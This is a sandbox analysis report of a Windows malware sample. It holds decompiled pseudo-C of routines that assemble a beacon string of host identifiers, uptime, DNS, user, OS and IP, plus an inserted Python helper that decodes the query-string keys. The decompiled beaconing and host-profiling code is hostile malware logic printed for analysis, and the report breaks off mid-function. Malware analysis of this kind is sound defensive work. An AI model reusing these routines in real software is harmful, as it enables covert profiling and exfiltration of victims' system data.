                                                  				int _t77;
                                                  				intOrPtr _t78;
                                                  				int _t81;
                                                  				intOrPtr _t83;
                                                  				int _t86;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr* _t90;
                                                  				void* _t91;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  				intOrPtr _t98;
                                                  				void* _t100;
                                                  				int _t101;
                                                  				void* _t102;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  
                                                  				_t95 = __edx;
                                                  				_t91 = __ecx;
                                                  				_t25 = __eax;
                                                  				_t105 = _a16;
                                                  				_v4 = 8;
                                                  				if(__eax == 0) {
                                                  					_t25 = GetTickCount();
                                                  				}
                                                  				_t26 =  *0x547d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t27 =  *0x547d014; // 0x3a87c8cd
                                                  				asm("bswap eax");
                                                  				_t28 =  *0x547d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t29 =  *0x547d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t30 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t3 = _t30 + 0x547e633; // 0x74666f73
                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x547d02c,  *0x547d004, _t25);
                                                  				_t33 = E05471C1A();
                                                  				_t34 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t4 = _t34 + 0x547e673; // 0x74707526
                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                  				_t108 = _t106 + 0x38;
                                                  				_t102 = _t101 + _t37;
                                                  				_t96 = E054754BC(_t91);
                                                  				if(_t96 != 0) {
                                                  					_t83 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t6 = _t83 + 0x547e8eb; // 0x736e6426
                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t86;
                                                  					HeapFree( *0x547d238, 0, _t96);
                                                  				}
                                                  				_t97 = E05477649();
                                                  				if(_t97 != 0) {
                                                  					_t78 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t8 = _t78 + 0x547e8f3; // 0x6f687726
                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t81;
                                                  					HeapFree( *0x547d238, 0, _t97);
                                                  				}
                                                  				_t98 =  *0x547d32c; // 0x73e95b0
                                                  				_a32 = E05479395(0x547d00a, _t98 + 4);
                                                  				_t42 =  *0x547d2cc; // 0x0
                                                  				if(_t42 != 0) {
                                                  					_t74 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t11 = _t74 + 0x547e8cd; // 0x3d736f26
                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t77;
                                                  				}
                                                  				_t43 =  *0x547d2c8; // 0x0
                                                  				if(_t43 != 0) {
                                                  					_t71 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t13 = _t71 + 0x547e8c6; // 0x3d706926
                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                  				}
                                                  				if(_a32 != 0) {
                                                  					_t100 = RtlAllocateHeap( *0x547d238, 0, 0x800);
                                                  					if(_t100 != 0) {
                                                  						E05477A80(GetTickCount());
                                                  						_t50 =  *0x547d32c; // 0x73e95b0
                                                  						__imp__(_t50 + 0x40);
                                                  						asm("lock xadd [eax], ecx");
                                                  						_t54 =  *0x547d32c; // 0x73e95b0
                                                  						__imp__(_t54 + 0x40);
                                                  						_t56 =  *0x547d32c; // 0x73e95b0
                                                  						_t103 = E05478307(1, _t95, _t105,  *_t56);
                                                  						asm("lock xadd [eax], ecx");
                                                  						if(_t103 != 0) {
                                                  							StrTrimA(_t103, 0x547c2ac);
                                                  							_push(_t103);
                                                  							_t62 = E05473CC8();
                                                  							_v16 = _t62;
                                                  							if(_t62 != 0) {
                                                  								_t89 = __imp__;
                                                  								 *_t89(_t103, _v0);
                                                  								 *_t89(_t100, _a4);
                                                  								_t90 = __imp__;
                                                  								 *_t90(_t100, _v28);
                                                  								 *_t90(_t100, _t103);
                                                  								_t68 = E05471199(0xffffffffffffffff, _t100, _v28, _v24);
                                                  								_v52 = _t68;
                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                  									E0547A1B0();
                                                  								}
                                                  								HeapFree( *0x547d238, 0, _v44);
                                                  							}
                                                  							HeapFree( *0x547d238, 0, _t103);
                                                  						}
                                                  						HeapFree( *0x547d238, 0, _t100);
                                                  					}
                                                  					HeapFree( *0x547d238, 0, _a24);
                                                  				}
                                                  				HeapFree( *0x547d238, 0, _t105);
                                                  				return _a12;
                                                  			}
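Both E0547A279 above and E05478B94 below assemble their request string from the same constants: the decompiler annotates each wsprintfA format-string pointer with the first DWORD stored at that offset (0x74666f73, 0x74707526, ...), and the four DWORDs at 0x547d00c..0x547d018 are byte-swapped with `bswap eax` before they are printed. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code, that turns those annotations back into something readable: it decodes each little-endian immediate into the four ASCII bytes it encodes and reproduces the `bswap`, so the hex values wsprintfA actually receives can be compared against captured traffic. The names (STRING_FRAGMENTS, ID_DWORDS, dword_to_ascii, bswap32) are mine, and the one assumption is that the constants are little-endian x86 DWORDs; the complete format string at 0x547e633 is not recovered on the page, so only the four-byte fragments visible in the decompiler comments are decoded.

```python
"""
Decode the immediate constants that appear as comments in the decompilation
of E0547A279 / E05478B94.

Added example; not part of the sandbox report or of the sample.
Assumption: the constants are little-endian x86 DWORDs, so the ASCII text
is read lowest byte first. Only the fragments the decompiler annotated are
decoded; the full wsprintfA format string is not on the page.
"""
import struct

# DWORD comments copied from the listing, keyed by the string-table offset
# the code computes as *0x547d27c + offset.
STRING_FRAGMENTS = {
    0x547E633: 0x74666F73,  # first wsprintfA format string
    0x547E673: 0x74707526,  # appended after E05471C1A()
    0x547E8EB: 0x736E6426,  # appended if E054754BC() returned a buffer
    0x547E8F3: 0x6F687726,  # appended if E05477649() returned a buffer
    0x547E8CD: 0x3D736F26,  # appended if *0x547d2cc != 0
    0x547E8C6: 0x3D706926,  # appended if *0x547d2c8 != 0
}

# The four DWORDs at 0x547d00c, 0x547d010, 0x547d014, 0x547d018, in the
# order they are passed to the first wsprintfA (after bswap).
ID_DWORDS = [0x8F8F86C2, 0xD8D2F808, 0x3A87C8CD, 0xF56CFA1F]


def dword_to_ascii(value: int) -> str:
    """Render a 32-bit little-endian immediate as the 4 ASCII bytes it stores."""
    return struct.pack("<I", value).decode("ascii")


def bswap32(value: int) -> int:
    """Mirror the x86 `bswap` instruction: reverse the byte order of a DWORD."""
    return struct.unpack(">I", struct.pack("<I", value))[0]


def decode_fragments(fragments=STRING_FRAGMENTS) -> dict:
    """Map each string-table offset to the text its first DWORD encodes."""
    return {addr: dword_to_ascii(v) for addr, v in fragments.items()}


def swapped_id_hex(dwords=ID_DWORDS) -> list:
    """Hex form of the ID DWORDs after bswap, as a %08x conversion would print them."""
    return ["%08x" % bswap32(d) for d in dwords]


if __name__ == "__main__":
    for addr, text in decode_fragments().items():
        print(f"0x{addr:08x}: {text!r}")
    print(swapped_id_hex())
```

The decode shows the annotated fragments are query-string keys ("soft", "&upt", "&dns", "&who", "&os=", "&ip="), which is how the code paths guarded by `*0x547d2cc` and `*0x547d2c8` map to optional fields in the string the function assembles; the swapped ID values are the hex text a `%08x` conversion would emit for the four DWORDs in the order the listing passes them.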

Instruction address column for E0547A279 (collapsed): 0x0547a279 to 0x0547a4fe.

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0547A290
                                                  • wsprintfA.USER32 ref: 0547A2DD
                                                  • wsprintfA.USER32 ref: 0547A2FA
                                                  • wsprintfA.USER32 ref: 0547A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547A32D
                                                  • wsprintfA.USER32 ref: 0547A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547A35F
                                                  • wsprintfA.USER32 ref: 0547A396
                                                  • wsprintfA.USER32 ref: 0547A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0547A3D3
                                                  • GetTickCount.KERNEL32 ref: 0547A3E3
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 0547A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 0547A415
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?,073E95B0), ref: 05478332
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(?,?,?,0547A428,?,073E95B0), ref: 0547833A
                                                    • Part of subcall function 05478307: strcpy.NTDLL ref: 05478351
                                                    • Part of subcall function 05478307: lstrcat.KERNEL32(00000000,?), ref: 0547835C
                                                    • Part of subcall function 05478307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0547A428,?,073E95B0), ref: 05478379
                                                  • StrTrimA.SHLWAPI(00000000,0547C2AC,?,073E95B0), ref: 0547A447
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(073E87FA,00000000,00000000,74ECC740,0547A453,00000000), ref: 05473CD8
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(?), ref: 05473CE0
                                                    • Part of subcall function 05473CC8: lstrcpy.KERNEL32(00000000,073E87FA), ref: 05473CF4
                                                    • Part of subcall function 05473CC8: lstrcat.KERNEL32(00000000,?), ref: 05473CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 0547A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0547A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 0547A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0547A47E
                                                    • Part of subcall function 05471199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 0547124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0547A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0547A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,073E95B0), ref: 0547A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 0547A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 0547A4ED
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: 6f6d37394cd94e89241f3dc744173e837f762cfd0f1b5c8ef2f37a217622b58b
                                                  • Instruction ID: 8fd5d2404ce63ee54a62dadf0219eac9aabc18fef84bb20555868aa27437b3e4
                                                  • Opcode Fuzzy Hash: 6f6d37394cd94e89241f3dc744173e837f762cfd0f1b5c8ef2f37a217622b58b
                                                  • Instruction Fuzzy Hash: 5061A87192020CAFC7299FA5EC8AFDA3FE8EF48214F050515F909D7260DF35E8169BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E05478B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t67;
                                                  				intOrPtr _t68;
                                                  				int _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t75;
                                                  				void* _t78;
                                                  				intOrPtr _t82;
                                                  				intOrPtr _t86;
                                                  				intOrPtr* _t88;
                                                  				void* _t94;
                                                  				intOrPtr _t101;
                                                  				signed int _t105;
                                                  				char** _t107;
                                                  				int _t110;
                                                  				intOrPtr* _t113;
                                                  				intOrPtr* _t115;
                                                  				intOrPtr* _t117;
                                                  				intOrPtr* _t119;
                                                  				intOrPtr _t122;
                                                  				intOrPtr _t127;
                                                  				int _t131;
                                                  				CHAR* _t133;
                                                  				intOrPtr _t134;
                                                  				void* _t135;
                                                  				void* _t144;
                                                  				int _t145;
                                                  				void* _t146;
                                                  				intOrPtr _t147;
                                                  				void* _t149;
                                                  				long _t153;
                                                  				intOrPtr* _t154;
                                                  				intOrPtr* _t155;
                                                  				intOrPtr* _t158;
                                                  				void* _t159;
                                                  				void* _t161;
                                                  
                                                  				_t144 = __edx;
                                                  				_t135 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					_t59 = GetTickCount();
                                                  				}
                                                  				_t60 =  *0x547d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t61 =  *0x547d014; // 0x3a87c8cd
                                                  				_t133 = _a16;
                                                  				asm("bswap eax");
                                                  				_t62 =  *0x547d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0x547d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t3 = _t64 + 0x547e633; // 0x74666f73
                                                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x547d02c,  *0x547d004, _t59);
                                                  				_t67 = E05471C1A();
                                                  				_t68 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t4 = _t68 + 0x547e673; // 0x74707526
                                                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                  				_t161 = _t159 + 0x38;
                                                  				_t146 = _t145 + _t71;
                                                  				_t72 = E054754BC(_t135);
                                                  				_t134 = __imp__;
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t127 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t7 = _t127 + 0x547e8eb; // 0x736e6426
                                                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                  					_t161 = _t161 + 0xc;
                                                  					_t146 = _t146 + _t131;
                                                  					HeapFree( *0x547d238, 0, _v8);
                                                  				}
                                                  				_t73 = E05477649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
                                                  					_t122 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t11 = _t122 + 0x547e8f3; // 0x6f687726
                                                  					wsprintfA(_t146 + _a16, _t11, _t73);
                                                  					_t161 = _t161 + 0xc;
                                                  					HeapFree( *0x547d238, 0, _v8);
                                                  				}
                                                  				_t147 =  *0x547d32c; // 0x73e95b0
                                                  				_t75 = E05479395(0x547d00a, _t147 + 4);
                                                  				_t153 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					HeapFree( *0x547d238, _t153, _a16);
                                                  					return _v12;
                                                  				} else {
                                                  					_t78 = RtlAllocateHeap( *0x547d238, 0, 0x800);
                                                  					_v8 = _t78;
                                                  					if(_t78 == 0) {
                                                  						L25:
                                                  						HeapFree( *0x547d238, _t153, _v20);
                                                  						goto L26;
                                                  					}
                                                  					E05477A80(GetTickCount());
                                                  					_t82 =  *0x547d32c; // 0x73e95b0
                                                  					__imp__(_t82 + 0x40);
                                                  					asm("lock xadd [eax], ecx");
                                                  					_t86 =  *0x547d32c; // 0x73e95b0
                                                  					__imp__(_t86 + 0x40);
                                                  					_t88 =  *0x547d32c; // 0x73e95b0
                                                  					_t149 = E05478307(1, _t144, _a16,  *_t88);
                                                  					_v28 = _t149;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t149 == 0) {
                                                  						L24:
                                                  						HeapFree( *0x547d238, _t153, _v8);
                                                  						goto L25;
                                                  					}
                                                  					StrTrimA(_t149, 0x547c2ac);
                                                  					_push(_t149);
                                                  					_t94 = E05473CC8();
                                                  					_v16 = _t94;
                                                  					if(_t94 == 0) {
                                                  						L23:
                                                  						HeapFree( *0x547d238, _t153, _t149);
                                                  						goto L24;
                                                  					}
                                                  					_t154 = __imp__;
                                                  					 *_t154(_t149, _a4);
                                                  					 *_t154(_v8, _v20);
                                                  					_t155 = __imp__;
                                                  					 *_t155(_v8, _v16);
                                                  					 *_t155(_v8, _t149);
                                                  					_t101 = E0547809F(0, _v8);
                                                  					_a4 = _t101;
                                                  					if(_t101 == 0) {
                                                  						_v12 = 8;
                                                  						L21:
                                                  						E0547A1B0();
                                                  						L22:
                                                  						HeapFree( *0x547d238, 0, _v16);
                                                  						_t153 = 0;
                                                  						goto L23;
                                                  					}
                                                  					_t105 = E054743DF(_t134, 0xffffffffffffffff, _t149,  &_v24);
                                                  					_v12 = _t105;
                                                  					if(_t105 == 0) {
                                                  						_t158 = _v24;
                                                  						_v12 = E0547163F(_t158, _a4, _a8, _a12);
                                                  						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                  						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                  						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                  						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                  						_t119 =  *_t158;
                                                  						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                  						E05479039(_t158);
                                                  					}
                                                  					if(_v12 != 0x10d2) {
                                                  						L16:
                                                  						if(_v12 == 0) {
                                                  							_t107 = _a8;
                                                  							if(_t107 != 0) {
                                                  								_t150 =  *_t107;
                                                  								_t156 =  *_a12;
                                                  								wcstombs( *_t107,  *_t107,  *_a12);
                                                  								_t110 = E054785DB(_t150, _t150, _t156 >> 1);
                                                  								_t149 = _v28;
                                                  								 *_a12 = _t110;
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					} else {
                                                  						if(_a8 != 0) {
                                                  							L19:
                                                  							E05479039(_a4);
                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						_v12 = _v12 & 0x00000000;
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 05478BA8
                                                  • wsprintfA.USER32 ref: 05478BF8
                                                  • wsprintfA.USER32 ref: 05478C15
                                                  • wsprintfA.USER32 ref: 05478C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478C53
                                                  • wsprintfA.USER32 ref: 05478C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05478CB2
                                                  • GetTickCount.KERNEL32 ref: 05478CC3
                                                  • RtlEnterCriticalSection.NTDLL(073E9570), ref: 05478CD7
                                                  • RtlLeaveCriticalSection.NTDLL(073E9570), ref: 05478CF5
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,0547A428,?,073E95B0), ref: 05478332
                                                    • Part of subcall function 05478307: lstrlen.KERNEL32(?,?,?,0547A428,?,073E95B0), ref: 0547833A
                                                    • Part of subcall function 05478307: strcpy.NTDLL ref: 05478351
                                                    • Part of subcall function 05478307: lstrcat.KERNEL32(00000000,?), ref: 0547835C
                                                    • Part of subcall function 05478307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0547A428,?,073E95B0), ref: 05478379
                                                  • StrTrimA.SHLWAPI(00000000,0547C2AC,?,073E95B0), ref: 05478D2C
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(073E87FA,00000000,00000000,74ECC740,0547A453,00000000), ref: 05473CD8
                                                    • Part of subcall function 05473CC8: lstrlen.KERNEL32(?), ref: 05473CE0
                                                    • Part of subcall function 05473CC8: lstrcpy.KERNEL32(00000000,073E87FA), ref: 05473CF4
                                                    • Part of subcall function 05473CC8: lstrcat.KERNEL32(00000000,?), ref: 05473CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 05478D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 05478D55
                                                  • lstrcat.KERNEL32(?,?), ref: 05478D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 05478D69
                                                    • Part of subcall function 0547809F: lstrlen.KERNEL32(?,00000000,0547D330,00000001,05472200,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9), ref: 054780A8
                                                    • Part of subcall function 0547809F: mbstowcs.NTDLL ref: 054780CF
                                                    • Part of subcall function 0547809F: memset.NTDLL ref: 054780E1
                                                  • wcstombs.NTDLL ref: 05478DFC
                                                    • Part of subcall function 0547163F: SysAllocString.OLEAUT32(?), ref: 05471680
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 05478E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05478E49
                                                  • HeapFree.KERNEL32(00000000,?,?,073E95B0), ref: 05478E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05478E6D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 4693e06ad813a859a6608b4652282cf17b6ca2eb37e442cf78dc1360ae73cd41
                                                  • Instruction ID: 6f7a1aa1e119994a597c0fd13155f4dbd2ba29f7b2ae230473c8e42e4ade6962
                                                  • Opcode Fuzzy Hash: 4693e06ad813a859a6608b4652282cf17b6ca2eb37e442cf78dc1360ae73cd41
                                                  • Instruction Fuzzy Hash: 4B913671A1020CAFCB15DFA9DC89AEE7FB9FF08250F144456F909E7260DB31A951DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E0547816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				long _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				void* __esi;
                                                  				long _t43;
                                                  				intOrPtr _t44;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				intOrPtr _t66;
                                                  				void* _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t75;
                                                  				void* _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t91;
                                                  
                                                  				_t79 =  *0x547d33c; // 0x73e9bc8
                                                  				_v24 = 8;
                                                  				_t43 = GetTickCount();
                                                  				_push(5);
                                                  				_t74 = 0xa;
                                                  				_v16 = _t43;
                                                  				_t44 = E054770F5(_t74,  &_v16);
                                                  				_v8 = _t44;
                                                  				if(_t44 == 0) {
                                                  					_v8 = 0x547c1ac;
                                                  				}
                                                  				_t46 = E05478022(_t79);
                                                  				_v12 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t80 = __imp__;
                                                  					_t48 =  *_t80(_v8, _t71);
                                                  					_t49 =  *_t80(_v12);
                                                  					_t50 =  *_t80(_a4);
                                                  					_t54 = E05472049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                  					_v20 = _t54;
                                                  					if(_t54 != 0) {
                                                  						_t75 =  *0x547d27c; // 0x1f6a5a8
                                                  						_t16 = _t75 + 0x547eb28; // 0x530025
                                                  						 *0x547d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                  						_push(4);
                                                  						_t77 = 5;
                                                  						_t57 = E054770F5(_t77,  &_v16);
                                                  						_v8 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_v8 = 0x547c1b0;
                                                  						}
                                                  						_t58 =  *_t80(_v8);
                                                  						_t59 =  *_t80(_v12);
                                                  						_t60 =  *_t80(_a4);
                                                  						_t91 = E05472049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                  						if(_t91 == 0) {
                                                  							E05479039(_v20);
                                                  						} else {
                                                  							_t66 =  *0x547d27c; // 0x1f6a5a8
                                                  							_t31 = _t66 + 0x547ec48; // 0x73006d
                                                  							 *0x547d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                  							 *_a16 = _v20;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_a20 = _t91;
                                                  						}
                                                  					}
                                                  					E05479039(_v12);
                                                  				}
                                                  				return _v24;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 05478181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 054781C1
                                                  • lstrlen.KERNEL32(00000000), ref: 054781CA
                                                  • lstrlen.KERNEL32(00000000), ref: 054781D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 054781DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 0547823E
                                                  • lstrlen.KERNEL32(?), ref: 05478247
                                                  • lstrlen.KERNEL32(?), ref: 0547824E
                                                  • lstrlenW.KERNEL32(?), ref: 05478255
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: ccae971451eb571b37ebc1692f31fb4b8c7397e20ccc89af9da909962ad8b50d
                                                  • Instruction ID: c6bd44ebb38a085d1c33e18dd476227d49a477edd32523530a8dfc9637ae118e
                                                  • Opcode Fuzzy Hash: ccae971451eb571b37ebc1692f31fb4b8c7397e20ccc89af9da909962ad8b50d
                                                  • Instruction Fuzzy Hash: B641387290011CEBCF15AFA5CC49ADEBFB5EF48314F054096ED04A7221DB369A11DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E0547205E(void* __eax, void* __ecx) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				long _v32;
                                                  				void _v104;
                                                  				char _v108;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				void* _t58;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t71;
                                                  
                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                  				_t69 =  *_t1;
                                                  				_t36 = E0547692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                  				_v8 = _t36;
                                                  				if(_t36 != 0) {
                                                  					L12:
                                                  					return _v8;
                                                  				}
                                                  				E0547A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                  				_t40 = _v12(_v12);
                                                  				_v8 = _t40;
                                                  				if(_t40 == 0 && ( *0x547d260 & 0x00000001) != 0) {
                                                  					_v32 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v108 = 0;
                                                  					memset( &_v104, 0, 0x40);
                                                  					_t47 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t18 = _t47 + 0x547e3e6; // 0x73797325
                                                  					_t68 = E054795B1(_t18);
                                                  					if(_t68 == 0) {
                                                  						_v8 = 8;
                                                  					} else {
